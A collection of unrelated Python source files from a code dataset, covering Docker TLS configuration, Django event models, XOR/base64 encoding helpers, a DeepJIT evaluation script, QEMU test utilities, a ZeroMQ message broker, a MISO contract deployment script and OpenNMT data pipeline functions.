"""Extracts the docker configuration as a dictionary suitable
to be passed as keywords to the docker client.
"""
params = {}
params["base_url"] = self.docker_host
# Note that this will throw if the certificates are not
# present at the specified paths.
# Note that the tls flag takes precedence against tls verify.
# This is docker behavior.
params["version"] = "auto"
if not self.tls:
return params
tls_kwargs = {}
tls_kwargs["client_cert"] = (self.tls_cert, self.tls_key)
tls_kwargs["verify"] = self.tls_verify
if self.tls_verify and self.tls_ca:
tls_kwargs["ca_cert"] = self.tls_ca
params["tls"] = tls.TLSConfig(**tls_kwargs)
return params
| StarcoderdataPython |
1677884 | <filename>eventmanagement/events/models.py
from django.db import models
# Create your models here.
# Organization Model
class Organization(models.Model):
# blank = True set the field as non compulsory
# Name of the organization
orgName = models.CharField(max_length=200, default='', blank=True)
# Address for the organization
Al1 = models.CharField(max_length=100, default=orgName, blank=True)
Al2 = models.CharField(max_length=100, default='', blank=True)
Al3 = models.CharField(max_length=100, default='', blank=True)
district = models.CharField(max_length=40, default='', blank=True)
state = models.CharField(max_length=100, default='', blank=True)
country = models.CharField(max_length=100, default='India', blank=True)
pinCode = models.IntegerField(default=0)
# Logo of the organization
logo = models.ImageField(blank=True)
def __str__(self):
return f"{self.orgName}"
# Organizer Model
class Organizer(models.Model):
OrganizerName = models.CharField(max_length=100) # Name of the organizer
OrganizerContactNumber = models.BigIntegerField(blank=True) # Contact Number of the organizer
OrganizerMail = models.EmailField(blank=True) # Email of the organizer
OrganizerOrganization = models.ForeignKey(Organization, on_delete=models.DO_NOTHING, blank=True) # Organization of the organizer
OrganizerPic = models.ImageField(blank=True) # Profile Picture of the organizer
def __str__(self):
return f"{self.Organizer}, {self.OrganizerMail}"
# Speaker Model
class Speaker(models.Model):
speakerName = models.CharField(max_length=100) # Name of the speaker
speakerPic = models.ImageField(blank=True) # Image of the speaker
speakerLinkedIn = models.URLField(blank=True) # LinkedIn of the speaker
speakerIG = models.URLField(blank=True) # InstaGram of the speaker
speakerFB = models.URLField(blank=True) # FaceBook of the speaker
speakerTwitter = models.URLField(blank=True) # Twitter of the speaker
speakerWebSite = models.URLField(blank=True) # WebSite of the speaker
def __str__(self):
return f"{self.speakerName}"
# Definition of an event
class Event(models.Model):
eventName = models.CharField(max_length=100, default='') # Name of the Event
eventDescription = models.TextField(max_length=1000, default='', blank=True) # Description of the event
eventSpeaker = models.ForeignKey(Speaker, on_delete=models.DO_NOTHING, blank=True) # Speaker of the Event
eventStartTime = models.DateTimeField(blank=True) # Start Time of the event
eventEndTime = models.DateTimeField(blank=True) # End Time of the event
eventVenue = models.CharField(max_length=200, blank=True) # Venue of the event
eventURL = models.URLField(blank=True) # URL of the event
eventPoster = models.ImageField(blank=True)
def __str__(self):
return f"{self.eventName}, {self.eventStartTime} to {self.eventEndTime}"
# Participant Model
class Participant(models.Model):
partName = models.CharField(max_length=100) # Name of the participant
partOrg = models.ForeignKey(Organization, on_delete=models.DO_NOTHING, blank=True) # Organization of the participant
partCountry = models.CharField(max_length=100) # Country of the participant
partContact = models.BigIntegerField(blank=True) # Contact Number of the participant
partMail = models.EmailField(blank=True) # Email of the participant
partPic = models.ImageField(blank=True) # Profile Picture of the participant
partEvents = models.ManyToManyField(Event, blank=True, related_name='participants')
def __str__(self):
return f"{self.partName}, {self.partOrg}"
| StarcoderdataPython |
1752115 | import base64
import string
hexdigits = set(string.hexdigits)
def hex2base64(hexstring):
return base64.b64encode(base64.b16decode(hexstring.upper())).decode('utf-8')
def base642hex(b64string):
return base64.b16encode(base64.b64decode(b64string)).decode('utf-8')
def xorhexstrings(hexstring1,hexstring2):
assert len(hexstring1) == len(hexstring2) and len(hexstring2) % 2 == 0
return f'{int(hexstring1,16)^int(hexstring2,16):0{len(hexstring2)}X}'
def makerepeatedkey(key,textlength):
newkey = textlength//len(key) * key
newkey += key[:textlength%len(key)]
return newkey
def hexifystring(cls,mystring):
if set(mystring.upper()) < cls.hexdigits:
return mystring.upper()
return base64.b16encode(mystring.encode('utf-8')).decode('utf-8')
def hammingdistance(cls,string1,string2):
mystring1,mystring2 = cls.hexifystring(string1), cls.hexifystring(string2)
assert len(mystring1) == len(mystring2)
xorstring = cls.xorhexstrings(mystring1,mystring2)
distance = 0
xorint = int(xorstring,16)
for i in range(4*len(xorstring)):
if xorint & 1 << i:
distance += 1
return distance
def makeblocks(hexstring,blocksize,mustbedivisible=False):
if mustbedivisible:
assert len(hexstring)%(2*blocksize) == 0
blocks = []
hexlength = len(hexstring)
for i in range(0,hexlength,2*blocksize):
if i+2*blocksize>hexlength:
break
blocks.append(hexstring[i:i+2*blocksize])
return blocks
class FileHelper():
@staticmethod
def readb64filetohex(filename):
with open(filename) as f:
return BinUtils.base642hex(''.join(f.read().split()))
@staticmethod
def readb64filetobytes(filename):
with open(filename) as f:
return base64.b64decode(''.join(f.read().split())) | StarcoderdataPython |
1667892 | from model import DeepJIT
from utils import mini_batches_test
from sklearn.metrics import roc_auc_score
import torch
from tqdm import tqdm
def eval(labels, predicts, thresh=0.5):
TP, FN, FP, TN = 0, 0, 0, 0
for lable, predict in zip(labels, predicts):
# print(predict)
if predict >= thresh and lable == 1:
TP += 1
if predict >= thresh and lable == 0:
FP += 1
if predict < thresh and lable == 1:
FN += 1
if predict < thresh and lable == 0:
TN += 1
# print(TP)
P = TP/(TP+FP)
R = TP/(TP+FN)
A = (TP+TN)/len(labels)
E = FP/(TP+FP)
print('Test data at Threshold %.2f -- Accuracy: %.2f, False Positives: %.2f, Precision: %.2f, Recall: %.2f'%(thresh, A, E, P, R))
def save_result(ids, labels, predicts, path):
results = []
for id, lable, predict in zip(ids, labels, predicts):
results.append('{}\t{}\n'.format(lable, predict))
with open(path, 'w', encoding='utf-8') as f:
f.writelines(results)
def evaluation_model(data, params):
ids, pad_msg, pad_code, labels, dict_msg, dict_code = data
batches = mini_batches_test(ids=ids, X_msg=pad_msg, X_code=pad_code, Y=labels)
params.vocab_msg, params.vocab_code = len(dict_msg), len(dict_code)
if len(labels.shape) == 1:
params.class_num = 1
else:
params.class_num = labels.shape[1]
# set up parameters
params.cuda = (not params.no_cuda) and torch.cuda.is_available()
del params.no_cuda
params.filter_sizes = [int(k) for k in params.filter_sizes.split(',')]
model = DeepJIT(args=params)
if torch.cuda.is_available():
model = model.cuda()
model.load_state_dict(torch.load(params.load_model))
model.eval() # eval mode (batchnorm uses moving mean/variance instead of mini-batch mean/variance)
all_id, all_predict, all_label = list(), list(), list()
with torch.no_grad():
for i, (batch) in enumerate(tqdm(batches)):
_id, pad_msg, pad_code, label = batch
if torch.cuda.is_available():
pad_msg, pad_code, labels = torch.tensor(pad_msg).cuda(), torch.tensor(
pad_code).cuda(), torch.cuda.FloatTensor(label)
else:
pad_msg, pad_code, label = torch.tensor(pad_msg).long(), torch.tensor(pad_code).long(), torch.tensor(
label).float()
if torch.cuda.is_available():
predict = model.forward(pad_msg, pad_code)
predict = predict.cpu().detach().numpy().tolist()
else:
predict = model.forward(pad_msg, pad_code)
predict = predict.detach().numpy().tolist()
all_predict += predict
all_label += label.tolist()
all_id += _id
# with open('result.txt', 'w', encoding='utf-8') as f:
# results = ['{}, {}\n'.format(label, predict) for label, predict in zip(all_label, all_predict)]
# f.writelines(results)
for thresh in [i/10 for i in range(1,10)]:
try:
eval(all_label, all_predict, thresh=thresh)
except Exception as identifier:
print("No predict larger than %f" % (thresh))
save_result(all_id, all_label, all_predict, params.load_model+'.result')
auc_score = roc_auc_score(y_true=all_label, y_score=all_predict)
print('Test data -- AUC score:', auc_score) | StarcoderdataPython |
3274966 | '''
Created on 2012-01-19
@author: innovation
'''
import unittest
import numpy as np
from tests.simualtors.joint_binomial import JointSnvMixSimulator
from joint_snv_mix.counter import JointBinaryCountData, JointBinaryQualityData
from joint_snv_mix.models.joint_snv_mix import JointSnvMixModel, JointSnvMixPriors, JointSnvMixParameters
class Test(unittest.TestCase):
def test_init(self):
mu = (
{'alpha' : 100, 'beta' : 2},
{'alpha' : 50, 'beta' : 50},
{'alpha' : 2, 'beta' : 100}
)
priors = JointSnvMixPriors(mu_N=mu, mu_T=mu)
params = JointSnvMixParameters()
model = JointSnvMixModel(priors, params, model='jsm2')
# sim = JointSnvMixSimulator(mu_T=[0.9, 0.3, 0.01])
# counts, labels = sim.draw_sample(100000)
#
# data = [JointBinaryCountData(*x) for x in counts]
# model.fit(data, verbose=True)
#
# correct = 0
#
# for x, t in zip(data, labels):
# p = model.predict(x)
#
# l = p.index(max(p))
# t = np.argmax(t)
#
# if t == l:
# correct += 1
#
# print correct
#
print model.params
q = [0] * 100
r = [1] * 100
data = [JointBinaryQualityData(q, r, q, r) for _ in range(100000)]
model.fit(data, verbose=True)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| StarcoderdataPython |
137638 | v0,v1,t=eval(input("enter v0,v1,t:"))
a=(v1-v0)/t
print(a)
| StarcoderdataPython |
1758116 | class Award:
def __init__(self,tconst,Award,Year,Category):
self.tconst = tconst
self.Award = Award
self.Year = Year
self.Category = Category
def __str__(self):
toString = 'Movie: '+self.tconst+', recieved a '+self.Award+' in '+self.Year
toString=toString+' in the category: '+self.Category
return toString
def getAward(self):
return self.Award
def getYear(self):
return self.Year
def getCategory(self):
return self.Category
def gettconst(self):
return self.tconst
| StarcoderdataPython |
3269042 | <filename>solved/67.py
#!/usr/bin/env python3
# https://projecteuler.net/problem=67
from solved import p18
# use a lambda such that the call stack
# for read_data() includes this file.
solve = lambda: p18.solve()
args = ()
solution = 7273
| StarcoderdataPython |
3275677 | # Test class and utilities for functional tests
#
# Copyright (c) 2018 Red Hat, Inc.
#
# Author:
# <NAME> <<EMAIL>>
#
# This work is licensed under the terms of the GNU GPL, version 2 or
# later. See the COPYING file in the top-level directory.
import logging
import os
import sys
import uuid
import tempfile
import avocado
SRC_ROOT_DIR = os.path.join(os.path.dirname(__file__), '..', '..', '..')
sys.path.append(os.path.join(SRC_ROOT_DIR, 'python'))
from qemu.machine import QEMUMachine
def is_readable_executable_file(path):
return os.path.isfile(path) and os.access(path, os.R_OK | os.X_OK)
def pick_default_qemu_bin(arch=None):
"""
Picks the path of a QEMU binary, starting either in the current working
directory or in the source tree root directory.
:param arch: the arch to use when looking for a QEMU binary (the target
will match the arch given). If None (the default), arch
will be the current host system arch (as given by
:func:`os.uname`).
:type arch: str
:returns: the path to the default QEMU binary or None if one could not
be found
:rtype: str or None
"""
if arch is None:
arch = os.uname()[4]
# qemu binary path does not match arch for powerpc, handle it
if 'ppc64le' in arch:
arch = 'ppc64'
qemu_bin_relative_path = os.path.join("%s-softmmu" % arch,
"qemu-system-%s" % arch)
if is_readable_executable_file(qemu_bin_relative_path):
return qemu_bin_relative_path
qemu_bin_from_src_dir_path = os.path.join(SRC_ROOT_DIR,
qemu_bin_relative_path)
if is_readable_executable_file(qemu_bin_from_src_dir_path):
return qemu_bin_from_src_dir_path
def wait_for_console_pattern(test, success_message, failure_message=None):
"""
Waits for messages to appear on the console, while logging the content
:param test: an Avocado test containing a VM that will have its console
read and probed for a success or failure message
:type test: :class:`avocado_qemu.Test`
:param success_message: if this message appears, test succeeds
:param failure_message: if this message appears, test fails
"""
console = test.vm.console_socket.makefile()
console_logger = logging.getLogger('console')
while True:
msg = console.readline().strip()
if not msg:
continue
console_logger.debug(msg)
if success_message in msg:
break
if failure_message and failure_message in msg:
console.close()
fail = 'Failure message found in console: %s' % failure_message
test.fail(fail)
def exec_command_and_wait_for_pattern(test, command,
success_message, failure_message=None):
"""
Send a command to a console (appending CRLF characters), then wait
for success_message to appear on the console, while logging the.
content. Mark the test as failed if failure_message is found instead.
:param test: an Avocado test containing a VM that will have its console
read and probed for a success or failure message
:type test: :class:`avocado_qemu.Test`
:param command: the command to send
:param success_message: if this message appears, test succeeds
:param failure_message: if this message appears, test fails
"""
command += '\r'
test.vm.console_socket.sendall(command.encode())
wait_for_console_pattern(test, success_message, failure_message)
class Test(avocado.Test):
def setUp(self):
self._vms = {}
arches = self.tags.get('arch', [])
if len(arches) == 1:
arch = arches.pop()
else:
arch = None
self.arch = self.params.get('arch', default=arch)
default_qemu_bin = pick_default_qemu_bin(arch=self.arch)
self.qemu_bin = self.params.get('qemu_bin',
default=default_qemu_bin)
if self.qemu_bin is None:
self.cancel("No QEMU binary defined or found in the source tree")
def _new_vm(self, *args):
vm = QEMUMachine(self.qemu_bin, sock_dir=tempfile.mkdtemp())
if args:
vm.add_args(*args)
return vm
@property
def vm(self):
return self.get_vm(name='default')
def get_vm(self, *args, name=None):
if not name:
name = str(uuid.uuid4())
if self._vms.get(name) is None:
self._vms[name] = self._new_vm(*args)
return self._vms[name]
def tearDown(self):
for vm in self._vms.values():
vm.shutdown()
| StarcoderdataPython |
3362299 | <reponame>bdrich/neutron-lbaas<filename>.tox/scenario/lib/python2.7/site-packages/oslo_messaging/_drivers/zmq_driver/broker/zmq_broker.py
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
from oslo_utils import excutils
from stevedore import driver
from oslo_messaging._drivers.zmq_driver.broker import zmq_queue_proxy
from oslo_messaging._drivers.zmq_driver import zmq_async
from oslo_messaging._i18n import _LE, _LI
zmq = zmq_async.import_zmq(zmq_concurrency='native')
LOG = logging.getLogger(__name__)
class ZmqBroker(object):
"""Local messaging IPC broker (nodes are still peers).
The main purpose is to have native zeromq application.
Benefits of such approach are following:
1. No risk to block the main thread of the process by unpatched
native parts of the libzmq (c-library is completely monkey-patch
unfriendly)
2. Making use of standard zmq approaches as async pollers,
devices, queues etc.
3. Possibility to implement queue persistence not touching existing
clients (staying in a separate process).
"""
def __init__(self, conf):
super(ZmqBroker, self).__init__()
self.conf = conf
self._create_ipc_dirs()
self.matchmaker = driver.DriverManager(
'oslo.messaging.zmq.matchmaker',
self.conf.rpc_zmq_matchmaker,
).driver(self.conf)
self.context = zmq.Context()
self.proxies = [zmq_queue_proxy.UniversalQueueProxy(
conf, self.context, self.matchmaker)
]
def _create_ipc_dirs(self):
ipc_dir = self.conf.rpc_zmq_ipc_dir
try:
os.makedirs("%s/fanout" % ipc_dir)
except os.error:
if not os.path.isdir(ipc_dir):
with excutils.save_and_reraise_exception():
LOG.error(_LE("Required IPC directory does not exist at"
" %s"), ipc_dir)
def start(self):
for proxy in self.proxies:
proxy.start()
def wait(self):
for proxy in self.proxies:
proxy.wait()
def close(self):
LOG.info(_LI("Broker shutting down ..."))
for proxy in self.proxies:
proxy.stop()
| StarcoderdataPython |
137326 | from brownie import *
from .settings import *
from .contracts import *
from .contract_addresses import *
import time
def main():
load_accounts()
# Initialise Project
operator = accounts[0]
wallet = accounts[1]
# GP: Split into public and miso access control
access_control = deploy_access_control(operator)
user_access_control = deploy_user_access_control(operator)
# user_access_control = access_control
# Setup MISOTokenFactory
miso_token_factory = deploy_miso_token_factory(access_control)
mintable_token_template = deploy_mintable_token_template()
if miso_token_factory.tokenTemplateId() == 0:
miso_token_factory.addTokenTemplate(
mintable_token_template, {'from': operator})
# Setup MISO Market
bento_box = deploy_bento_box()
crowdsale_template = deploy_crowdsale_template()
dutch_auction_template = deploy_dutch_auction_template()
miso_market = deploy_miso_market(
access_control, [dutch_auction_template, crowdsale_template])
uniswap_factory = deploy_uniswap_factory()
# MISOLauncher
weth_token = deploy_weth_token()
pool_liquidity_template = deploy_pool_liquidity_template()
miso_launcher = deploy_miso_launcher(access_control, weth_token, bento_box)
if miso_launcher.getLiquidityTemplateIndex(0) == ZERO_ADDRESS:
miso_launcher.addLiquidityLauncherTemplate(
pool_liquidity_template, {"from": accounts[0]})
# MISOFarmFactory
masterchef_template = deploy_masterchef_template()
farm_factory = deploy_farm_factory(access_control)
if farm_factory.farmTemplateId() == 0:
farm_factory.addFarmTemplate(
masterchef_template, {"from": accounts[0]})
# Create mintable for testing
recipe_02 = MISORecipe02.deploy(
miso_token_factory,
weth_token,
miso_market,
miso_launcher,
uniswap_factory,
farm_factory,
{"from": accounts[0]}
)
# recipe_02_address = web3.toChecksumAddress(0x3FD2f53bA85345E17aF41e845f1c41014962db5F)
# recipe_02 = MISORecipe02.at(recipe_02_address)
# Access control admin must set the smart contract roles
# user_access_control.addSmartContractRole(recipe_02, {'from': accounts[0]})
name = "Token"
symbol = "TKN"
tokensToMint = 1000 * TENPOW18
tokensToMarket = 200 * TENPOW18
paymentCurrency = ETH_ADDRESS
startTime = chain.time() + 50
endTime = chain.time() + 1000
market_rate = 100
market_goal = 200
launchwindow = 3 * 24 * 60 * 60
deadline = 200
locktime = 100
tokensToLiquidity = 100 * TENPOW18
# Create new Farm
rewards_per_block = 1 * TENPOW18
# Define the start time relative to sales
start_block = len(chain) + 10
dev_addr = wallet
tokensToFarm = 100 * TENPOW18
alloc_point = 10
integratorFeeAccount = accounts[1]
tx = recipe_02.prepareMiso(
name,
symbol,
user_access_control,
tokensToMint,
tokensToMarket,
paymentCurrency,
startTime,
endTime,
market_rate,
market_goal,
wallet,
operator,
deadline,
launchwindow,
locktime,
tokensToLiquidity,
rewards_per_block,
start_block,
dev_addr,
tokensToFarm,
alloc_point,
integratorFeeAccount, {'from': accounts[0]}
)
time.sleep(1)
print("tx events: " + str(tx.events))
| StarcoderdataPython |
3225639 | """Dataset creation and transformations."""
import numpy as np
import tensorflow as tf
from opennmt.utils import compat
from opennmt.utils import misc
def make_datasets(dataset_cls, filenames):
"""Creates instances of :obj:`dataset_cls`.
Args:
dataset_cls: A class inheriting from ``tf.data.Dataset``.
filenames: A list of filenames or a single filename.
Returns:
A list of ``tf.data.Dataset`` instances if multiple :obj:`filenames` are
passed, otherwise a single ``tf.data.Dataset``.
Raises:
ValueError: if :obj:`filenames` is empty.
"""
if not isinstance(filenames, list):
filenames = [filenames]
elif not filenames:
raise ValueError("At least one data file is required")
datasets = [
dataset_cls(
filename, compression_type="GZIP" if misc.is_gzip_file(filename) else None
)
for filename in filenames
]
if len(datasets) == 1:
return datasets[0]
return datasets
def normalize_weights(datasets, weights=None, sizes=None):
"""Returns normalized dataset weights based on datasets sizes.
Args:
datasets: A list of ``tf.data.Dataset`` instances.
weights: An optional list of dataset weights.
sizes: The size of each dataset, if known.
Returns:
A normalized list of weights that can be used as sampling probabilities.
Raises:
ValueError: if the length of :obj:`weights` or :obj:`sizes` does not match
the length of :obj:`datasets`.
"""
if not datasets:
return []
if len(datasets) == 1:
return [1.0]
if weights is None:
weights = [1 / len(datasets)] * len(datasets)
elif len(weights) != len(datasets):
raise ValueError(
"Got %d datasets but %d weights" % (len(datasets), len(weights))
)
if sizes is None:
sizes = [int(get_dataset_size(dataset)) for dataset in datasets]
elif len(sizes) != len(datasets):
raise ValueError("Got %d datasets but %d sizes" % (len(datasets), len(sizes)))
# Weights should be normalized by the dataset size relative to the total size.
total_size = sum(sizes)
weights = [weight * (size / total_size) for weight, size in zip(weights, sizes)]
# Convert weights to probabilities.
logits = tf.math.log(tf.constant(weights, dtype=tf.float32))
probabilities = tf.nn.softmax(logits).numpy().tolist()
return probabilities
def _get_output_shapes(dataset):
"""Returns the outputs shapes of the dataset.
Args:
dataset: A ``tf.data.Dataset``.
Returns:
A nested structure of ``tf.TensorShape``
"""
return tf.nest.map_structure(lambda spec: spec.shape, dataset.element_spec)
def get_dataset_size(dataset, batch_size=5000):
"""Get the dataset size.
Example:
>>> dataset = tf.data.Dataset.range(5)
>>> opennmt.data.get_dataset_size(dataset).numpy()
5
Args:
dataset: A dataset.
batch_size: The batch size to use to improve the scan performance, or
``None`` to scan the dataset as-is.
Returns:
The dataset size or ``None`` if the dataset is infinite.
"""
if dataset.cardinality() == tf.data.INFINITE_CARDINALITY:
return None
if batch_size is not None:
dataset = dataset.batch(batch_size)
def _reduce_func(count, element):
element = tf.nest.flatten(element)[0]
batch_size = tf.shape(element)[0]
return count + tf.cast(batch_size, count.dtype)
return dataset.reduce(tf.constant(0, dtype=tf.int64), _reduce_func)
def filter_irregular_batches(multiple):
"""Transformation that filters out batches based on their size.
Example:
>>> dataset = tf.data.Dataset.range(10).batch(3)
>>> dataset = dataset.apply(opennmt.data.filter_irregular_batches(3))
>>> len(list(iter(dataset)))
3
Args:
multiple: The divisor of the batch size.
Returns:
A ``tf.data.Dataset`` transformation.
"""
if multiple == 1:
return lambda dataset: dataset
def _predicate(*x):
flat = tf.nest.flatten(x)
batch_size = tf.shape(flat[0])[0]
return tf.equal(batch_size % multiple, 0)
return lambda dataset: dataset.filter(_predicate)
def filter_examples_by_length(
maximum_features_length=None,
maximum_labels_length=None,
features_length_fn=None,
labels_length_fn=None,
):
"""Transformation that filters out examples with zero length or length that is
greater than the configured maximum.
Example:
>>> dataset = dataset.apply(opennmt.data.filter_examples_by_length(...))
Args:
maximum_features_length: The maximum length or list of maximum lengths of
the features sequence(s). ``None`` to not constrain the length.
maximum_labels_length: The maximum length or list of maximum lengths of
the labels sequence(s). ``None`` to not constrain the length.
features_length_fn: A function mapping features to a sequence length.
labels_length_fn: A function mapping labels to a sequence length.
Returns:
A ``tf.data.Dataset`` transformation.
"""
if features_length_fn is None and labels_length_fn is None:
return lambda dataset: dataset
def _length_constraints(lengths, maximum_lengths):
# Work with lists of lengths which correspond to the general multi source case.
if not isinstance(lengths, list):
lengths = [lengths]
if not isinstance(maximum_lengths, list):
maximum_lengths = [maximum_lengths]
# Unset maximum lengths are set to None (i.e. no constraint).
maximum_lengths += [None] * (len(lengths) - len(maximum_lengths))
constraints = []
for length, maximum_length in zip(lengths, maximum_lengths):
constraints.append(tf.greater(length, 0))
if maximum_length is not None:
constraints.append(tf.less_equal(length, maximum_length))
return constraints
def _predicate(features, labels):
cond = []
features_length = (
features_length_fn(features) if features_length_fn is not None else None
)
labels_length = (
labels_length_fn(labels) if labels_length_fn is not None else None
)
if features_length is not None:
cond.extend(_length_constraints(features_length, maximum_features_length))
if labels_length is not None:
cond.extend(_length_constraints(labels_length, maximum_labels_length))
return tf.reduce_all(cond)
return lambda dataset: dataset.filter(_predicate)
def make_cardinality_multiple_of(divisor):
"""Transformation that ensures that the dataset cardinality is a multiple of
:obj:`divisor`.
Example:
>>> dataset = tf.data.Dataset.range(7)
>>> dataset = dataset.apply(opennmt.data.make_cardinality_multiple_of(10))
>>> len(list(iter(dataset)))
10
Args:
divisor: The value that should divide the dataset size.
Returns:
A ``tf.data.Dataset`` transformation.
Tip:
This transformation is useful when training multiple replicas on a finite
dataset. It ensures that each replica receives a non empty batch in the last
training iteration.
"""
if divisor == 1:
return lambda dataset: dataset
def _continue_iter(num_consumed, element):
# Continue iterating if the current element is from the original dataset or
# if the number of consumed batches is not a multiple of divisor.
is_original = element[0]
return tf.math.logical_or(
is_original, tf.math.not_equal(num_consumed % divisor, 0)
)
def _retrieve_element(num_consumed, element):
_ = num_consumed
return element[1]
def _transform(dataset):
# Nothing to do for infinite datasets.
if dataset.cardinality() == tf.data.INFINITE_CARDINALITY:
return dataset
# Concatenate extra batches with a flag.
extra_batches = dataset.repeat()
dataset = dataset.map(lambda *x: (tf.constant(True), x))
extra_batches = extra_batches.map(lambda *x: (tf.constant(False), x))
dataset = dataset.concatenate(extra_batches)
# Take all original batches and the number of extra batches required.
dataset = dataset.enumerate()
dataset = dataset.apply(tf.data.experimental.take_while(_continue_iter))
return dataset.map(_retrieve_element) # Retrieve the element only.
return _transform
def random_shard(shard_size, dataset_size):
"""Transformation that shards the dataset in a random order.
Example:
>>> dataset = tf.data.Dataset.range(6)
>>> dataset = dataset.apply(opennmt.data.random_shard(2, 6))
>>> list(dataset.as_numpy_iterator())
[0, 1, 4, 5, 2, 3]
Args:
shard_size: The number of examples in each shard.
dataset_size: The total number of examples in the dataset.
Returns:
A ``tf.data.Dataset`` transformation.
"""
num_shards = -(-dataset_size // shard_size) # Ceil division.
offsets = np.linspace(
0, dataset_size, num=num_shards, endpoint=False, dtype=np.int64
)
def _random_shard(dataset):
sharded_dataset = tf.data.Dataset.from_tensor_slices(offsets)
sharded_dataset = sharded_dataset.shuffle(num_shards)
sharded_dataset = sharded_dataset.flat_map(
lambda offset: dataset.skip(offset).take(shard_size)
)
return sharded_dataset
return _random_shard
def shuffle_dataset(buffer_size, shuffle_shards=True, dataset_size=None):
"""Transformation that shuffles the dataset based on its size.
Example:
>>> dataset = tf.data.Dataset.range(6)
>>> dataset = dataset.apply(opennmt.data.shuffle_dataset(3))
>>> list(dataset.as_numpy_iterator())
[2, 3, 1, 0, 4, 5]
Args:
buffer_size: The number of elements from which to sample.
shuffle_shards: When :obj:`buffer_size` is smaller than the dataset size,
the dataset is first sharded in a random order to add another level of
shuffling.
dataset_size: If the dataset size is already known, it can be passed here to
avoid a slower generic computation of the dataset size later.
Returns:
A ``tf.data.Dataset`` transformation.
"""
def _shuffle(dataset):
sample_size = buffer_size
if sample_size < 0 or shuffle_shards:
total_size = dataset_size
if total_size is None:
total_size = get_dataset_size(dataset)
tf.get_logger().info("Training on %d examples", total_size)
if sample_size < 0:
sample_size = total_size
elif sample_size < total_size:
dataset = dataset.apply(random_shard(sample_size, total_size))
dataset = dataset.shuffle(sample_size)
return dataset
return _shuffle
def batch_dataset(batch_size, padded_shapes=None):
"""Transformation that batches a dataset.
Example:
>>> dataset = dataset.apply(opennmt.data.batch_dataset(...))
Args:
batch_size: The batch size.
padded_shapes: The padded shapes for this dataset. If ``None``, the shapes
are automatically inferred from the dataset output shapes.
Returns:
A ``tf.data.Dataset`` transformation.
See Also:
:func:`opennmt.data.batch_sequence_dataset`
"""
return lambda dataset: dataset.padded_batch(
batch_size, padded_shapes=padded_shapes or _get_output_shapes(dataset)
)
def batch_sequence_dataset(
batch_size,
batch_type="examples",
batch_multiplier=1,
batch_size_multiple=1,
length_bucket_width=None,
length_fn=None,
padded_shapes=None,
):
"""Transformation that batches a dataset of sequences.
This implements an example-based and a token-based batching strategy
with optional bucketing of sequences.
Bucketing makes the batches contain sequences of similar lengths to optimize
the training efficiency. For example, if :obj:`length_bucket_width` is 5,
sequences will be organized by the following length buckets:
1 - 5 | 6 - 10 | 11 - 15 | ...
Then when building the next batch, sequences will be selected from the same
length bucket.
If the dataset has parallel elements (e.g. a parallel source and target
dataset), the element is assigned to the bucket corresponding to the maximum
length of all parallel elements.
Example:
>>> dataset = dataset.apply(opennmt.data.batch_sequence_dataset(...))
Args:
batch_size: The batch size.
batch_type: The training batching strategy to use: can be "examples" or
"tokens".
batch_multiplier: The batch size multiplier.
batch_size_multiple: When :obj:`batch_type` is "tokens", ensure that the
resulting batch size is a multiple of this value.
length_bucket_width: The width of the length buckets to select batch
candidates from. ``None`` to not constrain batch formation.
length_fn: A function or list of functions (in case of a parallel dataset)
that take features as argument and return the associated sequence length.
padded_shapes: The padded shapes for this dataset. If ``None``, the shapes
are automatically inferred from the dataset output shapes.
Returns:
A ``tf.data.Dataset`` transformation.
Raises:
ValueError: if :obj:`batch_type` is not one of "examples" or "tokens".
ValueError: if :obj:`batch_type` is "tokens" but :obj:`length_bucket_width`
is not set.
ValueError: if the number of length functions in :obj:`length_fn` does not
match the number of parallel elements.
See Also:
:func:`opennmt.data.batch_dataset`
"""
batch_size = batch_size * batch_multiplier
def _get_bucket_id(features, length_fn):
default_id = tf.constant(0, dtype=tf.int32)
if length_fn is None:
return default_id
lengths = length_fn(features)
if lengths is None:
return default_id
if not isinstance(lengths, list):
lengths = [lengths] # Fallback to the general case of parallel inputs.
lengths = [length // length_bucket_width for length in lengths]
return tf.reduce_max(lengths)
def _key_func(*args):
length_fns = length_fn
if length_fns is None:
length_fns = [None for _ in args]
elif not isinstance(length_fns, (list, tuple)):
length_fns = [length_fns]
if len(length_fns) != len(args):
raise ValueError(
"%d length functions were passed but this dataset contains "
"%d parallel elements" % (len(length_fns), len(args))
)
# Take the highest bucket id.
bucket_id = tf.reduce_max(
[
_get_bucket_id(features, length_fn)
for features, length_fn in zip(args, length_fns)
]
)
return tf.cast(bucket_id, tf.int64)
def _reduce_func(unused_key, dataset):
return dataset.apply(batch_dataset(batch_size, padded_shapes=padded_shapes))
def _window_size_func(key):
if length_bucket_width > 1:
key += 1 # For length_bucket_width == 1, key 0 is unassigned.
size = batch_size // (key * length_bucket_width)
required_multiple = batch_multiplier * batch_size_multiple
if required_multiple > 1:
size = size + required_multiple - size % required_multiple
return tf.cast(tf.maximum(size, required_multiple), tf.int64)
def _group_by_window(*args, **kwargs):
# TODO: clean this API when TensorFlow requirement is updated to >=2.6.
if compat.tf_supports("data.Dataset.group_by_window"):
return lambda dataset: dataset.group_by_window(*args, **kwargs)
else:
return tf.data.experimental.group_by_window(*args, **kwargs)
if length_bucket_width is None:
if batch_type == "tokens":
raise ValueError(
"Batch type 'tokens' requires length bucketing (the parameter "
"length_bucket_width should be non null)"
)
return batch_dataset(batch_size, padded_shapes=padded_shapes)
if batch_type == "examples":
return _group_by_window(_key_func, _reduce_func, window_size=batch_size)
elif batch_type == "tokens":
return _group_by_window(
_key_func, _reduce_func, window_size_func=_window_size_func
)
else:
raise ValueError(
"Invalid batch type: '{}'; should be 'examples' or 'tokens'".format(
batch_type
)
)
def training_pipeline(
batch_size,
batch_type="examples",
batch_multiplier=1,
batch_size_multiple=1,
process_fn=None,
transform_fns=None,
length_bucket_width=None,
features_length_fn=None,
labels_length_fn=None,
maximum_features_length=None,
maximum_labels_length=None,
single_pass=False,
num_shards=1,
shard_index=0,
num_threads=None,
dataset_size=None,
shuffle_buffer_size=None,
prefetch_buffer_size=None,
cardinality_multiple=1,
):
